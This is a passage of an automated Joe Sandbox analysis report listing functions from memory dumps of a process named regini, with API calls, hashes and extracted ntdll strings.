                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004A9EC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 01d431bbaebfac31586073470610e1a0683833a659bc116b844b43b4e7ef8420
                                                                                                              • Instruction ID: 72e087982b8702016d2f4ac34a93387d25cb83bcb50d4dcdf4dd71bb3eaf5f1c
                                                                                                              • Opcode Fuzzy Hash: 01d431bbaebfac31586073470610e1a0683833a659bc116b844b43b4e7ef8420
                                                                                                              • Instruction Fuzzy Hash: D6F0657734020436E26062EE9C03FD7B79C8B81765F14001AF70CEA2C1E995B90186ED
                                                                                                              Function 004C9810 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4F2B6C06,00000007,00000000,00000004,00000000,004B3CD7,000000F4), ref: 004C984F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction ID: 5846e53e32e70fc34b7ac3d3e7e5bceb4581112c63087e8d5e3fbe9a44361bd8
                                                                                                              • Opcode Fuzzy Hash: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                                                                              • Instruction Fuzzy Hash: 78E092752002047FC610EE99DC45FEB77ACEFC9714F008019F908A7241DA30BC118BB8
                                                                                                              Function 004B4463 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004B44E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                                                                              • Instruction ID: 66756bbbf33e89bbbaa2cf9891dbaf133bd9fe6485b1e11878f79a8d271cca1e
                                                                                                              • Opcode Fuzzy Hash: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                                                                              • Instruction Fuzzy Hash: 05E05560C0818C7BDB10CAB449152D8FBA0CFA2214F0446DEC99C53003E1344D258313
                                                                                                              Function 004C97C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(004B1949,?,004C5EDB,004B1949,004C55DF,004C5EDB,?,004B1949,004C55DF,00001000,?,?,00000000), ref: 004C97FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                                                                              • Instruction ID: fd13a679f9ebb39cd5469c71ba5c6e85584de5b715258866f9f6469f4de63090
                                                                                                              • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                                                                              • Instruction Fuzzy Hash: 4CE06DB52002087BD610EF59DC45FEB37ADEFC9714F404409F908A7242CA70B8118BB9
                                                                                                              Function 004B8097 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,004B1C50,004C7F1F,004C55DF,004B1C16), ref: 004B80D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: dc60f4255a1b059cff2eb29913a513c57fc59de4954b1290f92a9f66e951121b
                                                                                                              • Instruction ID: 00b4eff6e4873d19d3678297fe9102c4ce213ce0a70fdbbba7431a83e6efe4f5
                                                                                                              • Opcode Fuzzy Hash: dc60f4255a1b059cff2eb29913a513c57fc59de4954b1290f92a9f66e951121b
                                                                                                              • Instruction Fuzzy Hash: 66E086765401042FE750EAB4CC47FA63B695B51744F05455DF90CEB693E968F5008A58
                                                                                                              Function 004B80A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,004B1C50,004C7F1F,004C55DF,004B1C16), ref: 004B80D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 822d04b9f00d6765cb2fc4bf3cea851c7fc5ce36d9bcb841856529da519ea3b3
                                                                                                              • Instruction ID: 46af12d776f8d2042851ecf642cebbab55d2ad8e1105fd535d1d58b8806483c1
                                                                                                              • Opcode Fuzzy Hash: 822d04b9f00d6765cb2fc4bf3cea851c7fc5ce36d9bcb841856529da519ea3b3
                                                                                                              • Instruction Fuzzy Hash: E7D05EB52402043BE650B6A58C07FA7369C4B15794F0544A9BE0CE76C3FC68F50086AD
                                                                                                              Function 004B82D2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE ref: 004B82DC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_4a0000_regini.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                                              • Instruction ID: 9ddbb1af3b1bf40982f229f846e5c4864cf6caeea9649e615b081cb75f1c3975
                                                                                                              • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                                              • Instruction Fuzzy Hash: D4C08C3922080804EB2809FC78482E3334C9B8233CB140E96F82CD99E4D52A9CA7D02C
                                                                                                              Function 02DB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 82cb577cee538915e5fcf5625e32fb5726021a5f1710774c92489cb687b0c52f
                                                                                                              • Instruction ID: 0b624b3ff8606b0bb1a456525212171cc2439517c064e67ac85d4ed0f9655b42
                                                                                                              • Opcode Fuzzy Hash: 82cb577cee538915e5fcf5625e32fb5726021a5f1710774c92489cb687b0c52f
                                                                                                              • Instruction Fuzzy Hash: 52B09B729055C5C5DF12E7604A0DB177A006BD0702F25C065D2034761E4739C9D1F175

                                                                                                              Non-executed Functions

                                                                                                              Function 02B104DE Relevance: .2, Instructions: 150COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561059797.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1fa6f9d64e6495de7549c19792e16550921b0d2c8c0869c249b6bf00bfe131d4
                                                                                                              • Instruction ID: 9b4a005368fde137e27b2587b293d4c435b71ba910e4194a537361fc173a74d1
                                                                                                              • Opcode Fuzzy Hash: 1fa6f9d64e6495de7549c19792e16550921b0d2c8c0869c249b6bf00bfe131d4
                                                                                                              • Instruction Fuzzy Hash: 6D41E67061DB0D4FD368BF6890816B6B3E3FB85300F90496DD88AC3652EB74E8868785
                                                                                                              Function 02B1DF29 Relevance: 56.5, Strings: 45, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561059797.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3558027158
                                                                                                              • Opcode ID: 90a20e84085b95dfc8f696e2e7f90bcc2234ec38efdafe73100f3827129103f3
                                                                                                              • Instruction ID: 65901df1b1f4045f044689f71ae5c7b97cd72341af80dd103430d70935685973
                                                                                                              • Opcode Fuzzy Hash: 90a20e84085b95dfc8f696e2e7f90bcc2234ec38efdafe73100f3827129103f3
                                                                                                              • Instruction Fuzzy Hash: 20915EF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                                              Function 02DB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 7a827ed9f794db57c58ecd4706a66a39f82b8240c8d4fc81e75c88d29ba7baf1
                                                                                                              • Instruction ID: 4d4391b08221df0dbb91add03ed36a3bd60e664e03069036c4d029841e9d1cdb
                                                                                                              • Opcode Fuzzy Hash: 7a827ed9f794db57c58ecd4706a66a39f82b8240c8d4fc81e75c88d29ba7baf1
                                                                                                              • Instruction Fuzzy Hash: 3651D8B6A00116EFDF11DB5888949BEF7B8BF08700B508269E8AAD7741D334DE44CBE0
                                                                                                              Function 02E22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                                              • Instruction ID: c8f2eb597b586735d897f7d55e6ba94963f11143a7e693b8f862f39286aa9881
                                                                                                              • Opcode Fuzzy Hash: e6d9fb2e6a2244abcfa7a2dcf1a93d7d88d6cb952ef0b1fb7c801e65f1a0dbe3
                                                                                                              • Instruction Fuzzy Hash: 10510471A80665ABDB20CF9CC8909BEB7B9EB44204B04D459EA97C7641EB74DE08CB60
                                                                                                              Function 02DA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02DE4725
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02DE46FC
                                                                                                              • Execute=1, xrefs: 02DE4713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02DE4742
                                                                                                              • ExecuteOptions, xrefs: 02DE46A0
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02DE4655
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02DE4787
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 1b468c056ede539b1385058c76e1f56638773b647ecbeec02af3f107226a912b
                                                                                                              • Instruction ID: 2fdd819de320bc85eda1b7933be2301bf9cb9340d3e03ed0800f8f26001da04b
                                                                                                              • Opcode Fuzzy Hash: 1b468c056ede539b1385058c76e1f56638773b647ecbeec02af3f107226a912b
                                                                                                              • Instruction Fuzzy Hash: E451E7316402596AFF11ABA8DCA5FEEB7B9EF04304F140099D506A7391EB71DE45CFA0
                                                                                                              Function 02E46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dad6e1db5e3d3d8823d2c43483b14c2c43ab845b26913b2440fe7246af2d475b
                                                                                                              • Instruction ID: ee695c9d822f13d900e9ae5183529eefb4eb13bf181944a1232efa5c72160343
                                                                                                              • Opcode Fuzzy Hash: dad6e1db5e3d3d8823d2c43483b14c2c43ab845b26913b2440fe7246af2d475b
                                                                                                              • Instruction Fuzzy Hash: 95022671548341AFC709DF18D490A6FBBEAEFC9704F04992DF9894B264DB31E905CB92
                                                                                                              Function 02DBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: 9e674b193383a435f2229079432360430e6a98b784cd057ee353bacd58c3293f
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 6E818E74E05249DEDF268E68C8A17EEBBA2AF45318F18415BDC93AB790C7349C40CB61
                                                                                                              Function 02E220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                                              • Instruction ID: 854b5074efc422949a3988a95b4b4dce4e6eee094b76107a7f5694d583108d34
                                                                                                              • Opcode Fuzzy Hash: 5b0c0d7147783336c8aaa390c41aaa848c89ffafbc3444ea05018ec1488a742a
                                                                                                              • Instruction Fuzzy Hash: 81218176A00129ABDB10DF79DC54EFEBBE9EF44748F04412AEE06E3200E73099058BB0
                                                                                                              Function 02D9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 02DE031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DE02BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DE02E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 5454f19fc5cd9e43090a0312380e1b48fd9e5843312a97851d7f1b08fbdd045e
                                                                                                              • Instruction ID: 6df724197e3dc11a8081328621912b1bb51fdf12ce980094f9c8e539822c396f
                                                                                                              • Opcode Fuzzy Hash: 5454f19fc5cd9e43090a0312380e1b48fd9e5843312a97851d7f1b08fbdd045e
                                                                                                              • Instruction Fuzzy Hash: BCE1BA306087419FDB25DF28C884B2AB7E1EB84328F144A69F5A6DB7E0D7B5DC44CB52
                                                                                                              Function 02DABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 02DE7BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02DE7B7F
                                                                                                              • RTL: Resource at %p, xrefs: 02DE7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 185ef83d9776aeefd3b1ff2946b1ebdcd21aa71c4d4ada53b5fbddec345450ee
                                                                                                              • Instruction ID: 856b5d576b62fbc9df1270be725008b0ee3ccccd955c523789a0b051825db4d1
                                                                                                              • Opcode Fuzzy Hash: 185ef83d9776aeefd3b1ff2946b1ebdcd21aa71c4d4ada53b5fbddec345450ee
                                                                                                              • Instruction Fuzzy Hash: 0541BF317047029FDB20DE258850F6AB7E5EF98714F140A1EE996DB780DB71ED06CB91
                                                                                                              Function 02DAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DE728C
                                                                                                              Strings
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02DE7294
                                                                                                              • RTL: Re-Waiting, xrefs: 02DE72C1
                                                                                                              • RTL: Resource at %p, xrefs: 02DE72A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 31d2276c35eb27e6c92cb71e6c69e074ce29d17b6a162c5801b02304384b8503
                                                                                                              • Instruction ID: 06e4e0b19c85fb6ab97c055e9c0ee5fc02b86f5f103f8564535159e2d6b1e80b
                                                                                                              • Opcode Fuzzy Hash: 31d2276c35eb27e6c92cb71e6c69e074ce29d17b6a162c5801b02304384b8503
                                                                                                              • Instruction Fuzzy Hash: CB41E331700202ABEB21DE25CC41F66B7A5FF54718F104619F996DB380DB61EC46DBE1
                                                                                                              Function 02E22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002E6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2d40000_regini.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                                              • Instruction ID: d9f348a9c8a9347c422e72a830d998727055c2c7c320ead128cdb24db0b3afec
                                                                                                              • Opcode Fuzzy Hash: e3070000a7d546318fed43d99404a6513f10d23fadb19e10823c5c72697ca0b0
                                                                                                              • Instruction Fuzzy Hash: 3C31B872A002299FDB20DE28CD50BEE77F8EF44714F445455ED4AE3200EB309A488F60
                                                                                                              Function 02DB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D40000, based on PE: true
